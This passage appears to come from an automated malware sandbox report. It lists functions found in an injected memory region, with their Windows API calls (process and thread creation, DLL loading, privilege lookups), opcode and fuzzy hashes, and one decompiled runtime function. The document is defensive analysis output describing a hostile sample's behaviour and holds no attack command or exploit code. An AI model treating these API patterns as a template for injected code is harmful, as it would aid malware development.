                                                  Function 001A6F00, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 001A6FA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 36a22fcf330554bf59a8e62af1a19c5669103f09a975ef63098c64f2d8259488
                                                  • Instruction ID: 313fdee815b7694bcb2a44e7fd7cd6030a0d6b678cf70a0d91343e00e53f136b
                                                  • Opcode Fuzzy Hash: 36a22fcf330554bf59a8e62af1a19c5669103f09a975ef63098c64f2d8259488
                                                  • Instruction Fuzzy Hash: A63190B5602704ABC711DF68DCA1FABB7B8AB99700F04841DFA1A6B241D730A945CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A6EF6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 001A6FA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: f2cde9cf7f83420e0ee799c32c8f3d354293de06b30ac77d7d49ac9503d0f398
                                                  • Instruction ID: 4f9bb76a3861aecf34a1e9fa2e3467a0700ca7700c5529490115094581356b99
                                                  • Opcode Fuzzy Hash: f2cde9cf7f83420e0ee799c32c8f3d354293de06b30ac77d7d49ac9503d0f398
                                                  • Instruction Fuzzy Hash: E431CEB5601300AFCB11DF64DCA1FABB7B4BF99704F148029FA19AB281D770A955CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A84E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00193B93), ref: 001A851D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 200b1236dd45d6f6b696b0afbc21cd3e0f392dad90c952fd99b8e0673f249cbe
                                                  • Instruction ID: 27c70c56dc24f79f687c93282373ee78651c9ff5d390a471b1a4f490fef56a0a
                                                  • Opcode Fuzzy Hash: 200b1236dd45d6f6b696b0afbc21cd3e0f392dad90c952fd99b8e0673f249cbe
                                                  • Instruction Fuzzy Hash: 09F03AB5600204AFDB14DFA8DC85EEB77A9EF88354F14855AF90C97252D631E910CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A84F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00193B93), ref: 001A851D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction ID: c6ce32bec7e59681ec9333374584b2ccb75848c583b501788085554c0bb42db3
                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction Fuzzy Hash: 47E04FB52002046BD714DF99CC45EA777ACEF88750F014554FD0857281C630F910CAF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00197270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001972CA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001972EB
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 7477678e258f8a1c944d361f0765daf8534c5f111cf60e3ba95c0834cb6620a2
                                                  • Instruction ID: 495de865f307204721eca7897046b9f32b94d1feb8fd449f099920d69e9b98fe
                                                  • Opcode Fuzzy Hash: 7477678e258f8a1c944d361f0765daf8534c5f111cf60e3ba95c0834cb6620a2
                                                  • Instruction Fuzzy Hash: 2C01A231A9022877EB20A6949C03FFE776C5F51F50F150118FF04BA1C2E7A47A0686F6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00197243, Relevance: 3.0, APIs: 2, Instructions: 37threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001972CA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001972EB
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 71a63929cb84a28f844040292805275daa05daed063bea550055eb39e34d887a
                                                  • Instruction ID: b9cf3943cae5224f3140a3be8c4a625ff5d5586f56628990398df79ee6f4fcc3
                                                  • Opcode Fuzzy Hash: 71a63929cb84a28f844040292805275daa05daed063bea550055eb39e34d887a
                                                  • Instruction Fuzzy Hash: 65F0273179021837EA2866945C43FBAB3589F50F00F24006EFF04EE1C1E7956C0A46E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A85FE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0019CFB2,0019CFB2,?,00000000,?,?), ref: 001A8680
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 9fad957b15a9e40adcb8aff8bf16c70b838a9bd72e286716c2a5f722f5b1e87f
                                                  • Instruction ID: 84cfe4acf37acb185fce0fbd521ec50a0fe9c83f22fae5db3eaf547d1f993371
                                                  • Opcode Fuzzy Hash: 9fad957b15a9e40adcb8aff8bf16c70b838a9bd72e286716c2a5f722f5b1e87f
                                                  • Instruction Fuzzy Hash: 5B0129B5200208ABDB14DF98CC85EEB37A9AF89350F118558FA0CA7281DA30E810CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00199B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00199BA2
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: ef87672b97a0886e10f8764aa3424ab38db9c8552605d50ddf467932449397af
                                                  • Instruction ID: 952a9e77201b905702a751b9f2bce6521857789183f06183901f0838edcb142e
                                                  • Opcode Fuzzy Hash: ef87672b97a0886e10f8764aa3424ab38db9c8552605d50ddf467932449397af
                                                  • Instruction Fuzzy Hash: 4A015EB9D4020DBBDF10DAE4EC42F9EB3B89F54308F004195A90997241F775EB08CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A855D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001A85B4
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: baa5c75602193cf67aec5d82875ce24665ebe5ada14384b774ffd455682c1b0a
                                                  • Instruction ID: 84aadd9259efb4ee7374d94e0d363ce98a10aac8d7ceb21666f9d583a248d1ad
                                                  • Opcode Fuzzy Hash: baa5c75602193cf67aec5d82875ce24665ebe5ada14384b774ffd455682c1b0a
                                                  • Instruction Fuzzy Hash: 8C01A4B2214108BFCB54CF99DC80EEB37A9AF8C354F158258BA0DD7251C630E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A8560, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001A85B4
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: 3ad7102442f0be66c1149ac088aa7e4c332da64e78523bcabd2bc9f980b99037
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: 1101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A864A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0019CFB2,0019CFB2,?,00000000,?,?), ref: 001A8680
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 5b9ae7023e648b507c6ee3c4816add256e4ec0cebdde000e905ab0fe4f46bada
                                                  • Instruction ID: 72345c11c277bb4737c6f1d79f2b30f70a4b3fc64724d0e19747509259e23f5b
                                                  • Opcode Fuzzy Hash: 5b9ae7023e648b507c6ee3c4816add256e4ec0cebdde000e905ab0fe4f46bada
                                                  • Instruction Fuzzy Hash: 79F06DB56002086BDB10EF98DC81EEB73A9EF85250F008455F90D57282DA31E910C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0019D417, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00197C73,?), ref: 0019D44B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b4961ff9ad1e4f3d6c131924838efe820b4d5e79586f7ac49b324fc28cd1828b
                                                  • Instruction ID: 33bf82d53c53fba2559d60ded1087f5177c61aa4d6a8abc736cb9d98e8adda6e
                                                  • Opcode Fuzzy Hash: b4961ff9ad1e4f3d6c131924838efe820b4d5e79586f7ac49b324fc28cd1828b
                                                  • Instruction Fuzzy Hash: 50F0A7767502086BEB10EF64EC47F66738DDB85B40F084669F80DCB283EA2AD6508556
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A7030, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0019CCE0,?,?), ref: 001A706C
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: ca86d9644e9502949affe4b5afe844cf92b74535f1eae585e077dac518a76b6f
                                                  • Instruction ID: d9e4b8e1363e84aea1d7f915beec5555145771d78d4c0bd35ae56d56d96bb9a2
                                                  • Opcode Fuzzy Hash: ca86d9644e9502949affe4b5afe844cf92b74535f1eae585e077dac518a76b6f
                                                  • Instruction Fuzzy Hash: E0E092773807043AE33065A9AC03FA7B39CDB92B60F540026FB0DEB2C1DA95F90142A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A7023, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0019CCE0,?,?), ref: 001A706C
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 2a8e482533c11884e4bf7330ebac2a28bc90ce713407bb699b206f04b33797ba
                                                  • Instruction ID: 33a8a80a4dbedf4305eafe5ed70e5d496a5b6047cd13cf50788ba94997323194
                                                  • Opcode Fuzzy Hash: 2a8e482533c11884e4bf7330ebac2a28bc90ce713407bb699b206f04b33797ba
                                                  • Instruction Fuzzy Hash: F5F0227639030036E23035689C03FE7A7688F92BA0FA50214F659AB2C2CA95B90342A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A84B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(001A3526,?,001A3C9F,001A3C9F,?,001A3526,?,?,?,?,?,00000000,00000000,?), ref: 001A84DD
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction ID: 9767882067cf8fb27d7b0053090dac4e6271f8ca294b85fb67af08390ba15e4c
                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction Fuzzy Hash: 70E012B5200208ABDB14EF99CC41EA777ACAF88650F118558BA085B282CA30F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A8650, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0019CFB2,0019CFB2,?,00000000,?,?), ref: 001A8680
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: 97971a77ea3941802f71c411bb529cccb380e37d9f788b8a1d9a38603a14552d
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: 4CE01AB56002086BDB10DF89CC85EE737ADAF89650F018154BA0857281CA30E810CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0019D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00197C73,?), ref: 0019D44B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: f4b2d3c80fef4e1ed9234399ccc800ced375e2552eb2fd684dc477add91dcf09
                                                  • Instruction ID: f9062af2f796da79fa6b80a61e891b6ba702746f6fa038ca4772baf0777e2bf8
                                                  • Opcode Fuzzy Hash: f4b2d3c80fef4e1ed9234399ccc800ced375e2552eb2fd684dc477add91dcf09
                                                  • Instruction Fuzzy Hash: 4CD0A7757503043BEA10FBA49C03F2672CC5B55F00F494074F948D73C3DA64F5004161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0445967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9d80d72869f775c7f8868b6d8989790b0fe37b461f0fdecab9e4dc79bb359686
                                                  • Instruction ID: 34016937af3f065d9cb9ef0f27f810c7c815e8217ec668839aba8483cfe75341
                                                  • Opcode Fuzzy Hash: 9d80d72869f775c7f8868b6d8989790b0fe37b461f0fdecab9e4dc79bb359686
                                                  • Instruction Fuzzy Hash: F6B09BF1D014C5C5FF11D7614608717794077D0745F16C053D1030651B477CD095F5B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 001A62C9, Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 142cf5061b3bf09b0c2cc2afaa622d41960dbb49af42d913485ac3ee7a71ab65
                                                  • Instruction ID: d0213b46b71aa7c4f486d0c1e819f6cb384cedbfed55103bec1786bc03fcd907
                                                  • Opcode Fuzzy Hash: 142cf5061b3bf09b0c2cc2afaa622d41960dbb49af42d913485ac3ee7a71ab65
                                                  • Instruction Fuzzy Hash: 1BE02035D087C1CED7219D75E441161FB74FD8726579C1E9FD54C4B101C7214045CB8C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00196A99, Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29ee29965a687e986ce767a0c3ad9abbd6040ba2296245888105d70cabc5ec53
                                                  • Instruction ID: 27ac9d235227f8a2b78ce470782752e2de042d6481d0dd7be0c89481534c4a98
                                                  • Opcode Fuzzy Hash: 29ee29965a687e986ce767a0c3ad9abbd6040ba2296245888105d70cabc5ec53
                                                  • Instruction Fuzzy Hash: E1C08CB7E0A01826A4280C4D78A25F0F39CC787238E01339BED08BBAA00083C85200CA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 044AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E044AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0445CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E044A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E044A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x044afdda
                                                  0x044afde2
                                                  0x044afde5
                                                  0x044afdec
                                                  0x044afdfa
                                                  0x044afdff
                                                  0x044afe0a
                                                  0x044afe0f
                                                  0x044afe17
                                                  0x044afe1e
                                                  0x044afe19
                                                  0x044afe19
                                                  0x044afe19
                                                  0x044afe20
                                                  0x044afe21
                                                  0x044afe22
                                                  0x044afe25
                                                  0x044afe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044AFDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044AFE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044AFE2B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: fc9b263f817bacf31da068bdd7477b6717312a3476a926be36559fe6c2a30fbc
                                                  • Instruction ID: 5d13f79f696beb46bf180270ec8fb71b4bbc0095d419efeac8831d271a6da22e
                                                  • Opcode Fuzzy Hash: fc9b263f817bacf31da068bdd7477b6717312a3476a926be36559fe6c2a30fbc
                                                  • Instruction Fuzzy Hash: E4F0C8362002017BEF201A45DC05F23BB5AEB54730F244216F628595D1E962B83096A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%